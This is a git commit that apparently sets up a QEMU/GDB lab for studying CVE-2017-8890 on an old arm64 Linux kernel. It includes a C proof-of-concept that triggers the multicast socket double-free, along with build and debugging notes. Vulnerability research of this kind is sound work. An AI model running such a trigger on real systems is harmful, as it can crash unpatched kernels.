Initial commit

142a0b29 · Werner Sembach · 142a0b29 · 142a0b29 · 142a0b29 · 142a0b29
Commit 142a0b29 authored 6 years ago by Werner Sembach
--- a/.gitignore
+++ b/.gitignore
+/busybox-1.29.3
+/busybox-1.29.3.tar.bz2
+/linux-3.10.105
+/linux-3.10.105.tar.gz
--- a/CVE-2017-8890_PoC.c
+++ b/CVE-2017-8890_PoC.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <string.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <fcntl.h>
+#include <time.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <net/if.h>
+#include <errno.h>
+#include <assert.h>
+#define HELLO_WORLD_SERVER_PORT    6666
+#define LENGTH_OF_LISTEN_QUEUE 1
+#define BUFFER_SIZE 1024
+#define FILE_NAME_MAX_SIZE 512
+int server_init = 0;
+int server_finish = 0;
+int client_finish = 0;
+void *server(void *arg) {
+    struct sockaddr_in server_addr;
+    bzero(&server_addr, sizeof(server_addr));
+    server_addr.sin_family = AF_INET;
+    server_addr.sin_addr.s_addr = htons(INADDR_ANY);
+    server_addr.sin_port = htons(HELLO_WORLD_SERVER_PORT);
+    struct group_req group = {0};
+    struct sockaddr_in *psin;
+    psin = (struct sockaddr_in *) &group.gr_group;
+    psin->sin_family = AF_INET;
+    psin->sin_addr.s_addr = htonl(inet_addr("10.10.2.224"));
+    int server_socket = socket(PF_INET, SOCK_STREAM, 0);
+    if (server_socket < 0) {
+        printf("[Server]Create Socket Failed!");
+        exit(EXIT_FAILURE);
+    }
+    if(setsockopt(server_socket, IPPROTO_IP, MCAST_JOIN_GROUP, &group, sizeof(group))) {
+        perror("[Server]Server Socket Join Group Failed!");
+        exit(EXIT_FAILURE);
+    }
+    if (bind(server_socket, (struct sockaddr *) &server_addr, sizeof(server_addr))) {
+        printf("[Server]Server Bind Port : %d Failed!", HELLO_WORLD_SERVER_PORT);
+        exit(EXIT_FAILURE);
+    }
+    if (listen(server_socket, LENGTH_OF_LISTEN_QUEUE)) {
+        printf("[Server]Server Listen Failed!");
+        exit(EXIT_FAILURE);
+    }
+    struct sockaddr_in client_addr;
+    socklen_t length = sizeof(client_addr);
+    server_init = 1;
+    printf("[Server]accept..... \n");
+    int new_server_socket = accept(server_socket, (struct sockaddr *) &client_addr, &length);
+    if (new_server_socket < 0) {
+        close(server_socket);
+        printf("[Server]Server Accept Failed!\n");
+        return NULL;
+    }
+    printf("[Server]close new_server_socket \n");
+    close(new_server_socket);
+    sleep(5); //there must be a period between 2 close()
+    printf("[Server]close socket fd \n");
+    close(server_socket);
+    server_finish = 1;
+    return NULL;
+}
+void *client(void *arg) {
+    struct sockaddr_in client_addr;
+    bzero(&client_addr, sizeof(client_addr));
+    client_addr.sin_family = AF_INET;
+    client_addr.sin_addr.s_addr = htons(INADDR_ANY);
+    client_addr.sin_port = htons(0);
+    int client_socket = socket(AF_INET, SOCK_STREAM, 0);
+    if (client_socket < 0) {
+        printf("[Client]Create socket failed!\n");
+        exit(EXIT_FAILURE);
+    }
+    if (bind(client_socket, (struct sockaddr *) &client_addr, sizeof(client_addr))) {
+        printf("[Client] client bind port failed!\n");
+        exit(EXIT_FAILURE);
+    }
+    struct sockaddr_in server_addr;
+    bzero(&server_addr, sizeof(server_addr));
+    server_addr.sin_family = AF_INET;
+    if (inet_aton("127.0.0.1", &server_addr.sin_addr) == 0) {
+        printf("[Client]Server IP Address error\n");
+        exit(EXIT_FAILURE);
+    }
+    server_addr.sin_port = htons(HELLO_WORLD_SERVER_PORT);
+    socklen_t server_addr_length = sizeof(server_addr);
+    if (connect(client_socket, (struct sockaddr *) &server_addr, server_addr_length) < 0) {
+        printf("[Client]cannot connect to 127.0.0.1!\n");
+        exit(EXIT_FAILURE);
+    }
+    printf("[Client]Close client socket\n");
+    close(client_socket);
+    client_finish = 1;
+    return NULL;
+}
+int main(int argc, char *argv[]) {
+    pthread_t id_server, id_client;
+    pthread_create(&id_server, NULL, server, NULL);
+    while (!server_init) {
+        sleep(1);
+    }
+    pthread_create(&id_client, NULL, client, NULL);
+    while (!server_finish || !client_finish) {
+        sleep(1);
+    }
+    printf("exit...\n");
+    return EXIT_SUCCESS;
+}
--- a/Notes.md
+++ b/Notes.md
+### GDB Commands
+```
+aarch64-linux-gnu-gdb linux-3.10.105/vmlinux
+```
+```
+target remote localhost:1234
+set print pretty on
+define hook-stop #define comands executed after each step
+list #show source code
+disassemble
+info locals
+info args
+print *(struct inet_sock *)sk
+print *((struct inet_sock *)sk)->mc_list
+print sizeof(*((struct inet_sock *)sk)->mc_list)
+```
+### etc/init.d/rcS
+```
+#!/bin/sh
+mount -t proc none /proc
+mount -t sysfs none /sys
+/sbin/mdev -s
+#enable localhost
+ip link set lo up
+#enable multicast
+route add -net 224.0.0.0 netmask 240.0.0.0 dev lo
+#these both are needed for CVE-2017-8890 as the vuln is within a mc specific pointer
+```
+### Compile Kernel
+```
+export ARCH=arm64
+export CROSS_COMPILE=aarch64-linux-gnu-
+make defconfig
+make -j8
+```
+### Compile Busybox
+```
+export ARCH=arm64
+export CROSS_COMPILE=aarch64-linux-gnu-
+make menuconfig #enable static compilation
+make -j8 install
+cd _install
+mkdir proc sys dev etc etc/init.d
+vim etc/init.d/rcS #paste config from above
+chmod +x etc/init.d/rcS
+find . | cpio -o --format=newc > ../rootfs.img
+```
+### QEMU
+```
+# -s open port for gdb, -S stop and wait for gdb bevore running the kernel
+# console=ttyAMA0 first serial console on aarch64
+qemu-system-aarch64 -M virt -cpu cortex-a53 -nographic -kernel $SCRIPTDIR/linux-3.10.105/arch/arm64/boot/Image -initrd $SCRIPTDIR/busybox-1.29.3/rootfs.img -append "console=ttyAMA0 root=/dev/ram rdinit=/linuxrc" -s -S
+```
--- a/run.sh
+++ b/run.sh
+#!/bin/bash
+SCRIPTDIR=$(dirname "$0")
+if [ "$#" == 0 ]; then
+    qemu-system-aarch64 -M virt -cpu cortex-a53 -nographic -kernel $SCRIPTDIR/linux-3.10.105/arch/arm64/boot/Image -initrd $SCRIPTDIR/busybox-1.29.3/rootfs.img -append "console=ttyAMA0 root=/dev/ram rdinit=/linuxrc" -s -S
+else
+    qemu-system-aarch64 -M virt -cpu cortex-a53 -nographic -kernel $1 -initrd $SCRIPTDIR/busybox-1.29.3/rootfs.img -append "console=ttyAMA0 root=/dev/ram rdinit=/linuxrc" -s -S
+fi